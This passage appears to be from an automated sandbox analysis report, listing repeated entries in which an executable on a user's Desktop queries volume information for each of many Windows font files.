            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
